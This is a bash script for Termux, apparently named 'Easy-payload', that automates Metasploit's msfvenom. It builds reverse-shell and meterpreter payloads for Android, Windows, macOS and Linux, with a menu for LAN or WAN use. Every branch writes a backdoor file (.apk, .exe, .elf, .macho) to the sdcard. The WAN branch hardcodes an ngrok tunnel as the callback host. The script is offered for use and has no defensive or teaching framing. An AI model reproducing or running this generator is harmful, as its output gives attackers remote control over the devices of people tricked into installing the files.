#!/data/data/com.termux/files/usr/bin/bash
cyan='\033[1;36m'

green='\033[1;32m'

red='\033[1;31m'

yellow='\033[1;33m'

blue='\033[1;34m'

purple='\033[1;35m'

reset='\033[0m'

grey='\033[1;30m'

echo -e "$grey  ___________ "
echo -e "$cyan /   _____/  | __ "
echo -e "$blue \_____   \| |/ / "
echo -e "$yellow  /        \   <  "
echo -e "$cyan /_______  /__|_ \ "
echo -e "$grey         \/     \/ "
#Official Sk script
echo -e "$red COPYRIGT - all rights reserved "
echo -e "$grey _____$blue Easy-$yellow payload______"
echo -e "$cyan Hello Freinds This is Suyash "
echo -e "$yellow You Are Using My Script"
echo -e "$grey V2.0$blue - With WAN support"
echo -e "$red [ # ] Metasploit Must Be Install...."
echo -e "$red [ # ] Metasploit Directory Must be in Home..."
echo -e "$cyan Pls Select Network type"
echo -e "$green 1-> WAN"
echo -e "$green 2-> LAN"
read -p 'Choice: ' lw
if [ $lw = '2' ];
then
echo -e "$cyan Pls Select Platform Of Payload"
echo -e "$green 1-> Android"
echo -e "$green 2-> Windows"
echo -e "$green 3-> Mac"
echo -e "$green 4-> Linux"
echo -e "$green 5-> Exit"
echo -e "$cyan"
read -p 'Choice:' ch2
if [ $ch2 = '5' ];
then 
echo -e "$blue Bye Bye..... "
clear
fi
if [ $ch2 = '4' ];
then
read -p 'Pls Enter LHOST:' lhost
read -p 'Pls Enter LPORT:' lport
echo -e "$grey [*] Please Wait Loading ..."
cd $HOME
cd metasploit-framework
ruby msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f elf > /sdcard/sklinux.elf
echo -e "Payload name is $cyan sklinux.elf"
echo -e "$green Payload Saved In Sdcard"
fi
if [ $ch2 = '3' ];
then
read -p 'Pls Enter LHOST:' lhost
read -p 'Pls Enter LPORT:' lport
echo -e "$grey [*] Please Wait Loading ..."
cd $HOME
cd metasploit-framework
ruby msfvenom -p osx/x86/shell_reverse_tcp LHOST=$lhost LPORT=$lport -f macho > /sdcard/skshell.macho
echo -e "Payload name is $cyan skshell.macho"
echo -e "$green Payload Saved In Sdcard"
fi
if [ $ch2 = '2' ];
then
read -p 'Pls Enter LHOST:' lhost
read -p 'Pls Enter LPORT:' lport
echo -e "$grey [*] Please Wait Loading ..."
cd $HOME
cd metasploit-framework
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f exe > /sdcard/skshell.exe
echo -e "Payload name is $cyan skshell.exe"
echo -e "$green Payload Saved In Sdcard"
fi
if [ $ch2 = '1' ];
then
read -p 'Pls Enter LHOST:' lhost
read -p 'Pls Enter LPORT:' lport
echo -e "$grey [*] Please Wait Loading ..."
cd $HOME
cd metasploit-framework
msfvenom -p android/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R > /sdcard/skapp.apk
echo -e "Payload name is $cyan skapp.apk"
echo -e "$green Payload Saved In Sdcard"
fi
fi
if [ $lw = '1' ];
then
echo -e "$cyan Pls Select Platform Of Payload"
echo -e "$green 1-> Android"
echo -e "$green 2-> Windows"
echo -e "$green 3-> Mac"
echo -e "$green 4-> Linux"
echo -e "$green 5-> Exit"
echo -e "$cyan"
read -p 'Choice:' ch2
if [ $ch2 = '5' ];
then 
echo -e "$blue Bye Bye..... "
clear
fi
if [ $ch2 = '4' ];
then
read -p 'Pls Enter LPORT:' lport
echo -e "$grey [*] Please Wait Loading ..."
cd $HOME
cd metasploit-framework
ruby msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=$lport -f elf > /sdcard/sklinux.elf
echo -e "Payload name is $cyan sklinux.elf"
echo -e "$green Payload Saved In Sdcard"
fi
if [ $ch2 = '3' ];
then
read -p 'Pls Enter LPORT:' lport
echo -e "$grey [*] Please Wait Loading ..."
cd $HOME
cd metasploit-framework
ruby msfvenom -p osx/x86/shell_reverse_tcp LHOST=0.tcp.ngrok.io LPORT=$lport -f macho > /sdcard/skshell.macho
echo -e "Payload name is $cyan skshell.macho"
echo -e "$green Payload Saved In Sdcard"
fi
if [ $ch2 = '2' ];
then
read -p 'Pls Enter LPORT:' lport
echo -e "$grey [*] Please Wait Loading ..."
cd $HOME
cd metasploit-framework
msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=$lport -f exe > /sdcard/skshell.exe
echo -e "Payload name is $cyan skshell.exe"
echo -e "$green Payload Saved In Sdcard"
fi
if [ $ch2 = '1' ];
then
read -p 'Pls Enter LPORT:' lport
echo -e "$grey [*] Please Wait Loading ..."
cd $HOME
cd metasploit-framework
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=$lport R > /sdcard/skapp.apk
echo -e "Payload name is $cyan skapp.apk"
echo -e "$green Payload Saved In Sdcard" 
fi
fi
echo -e "$grey  ___________ "
echo -e "$cyan /   _____/  | __ "
echo -e "$blue \_____   \| |/ / "
echo -e "$yellow  /        \   <  "
echo -e "$cyan /_______  /__|_ \ "
echo -e "$grey         \/     \/ "
#echo "Official Sk script©"
echo -e "$yellow More Support Coming Soon"
echo -e "$cyan For Any Problem Contact me On"
echo -e "$green suyash_yt@datamail.in"
echo -e "$reset"
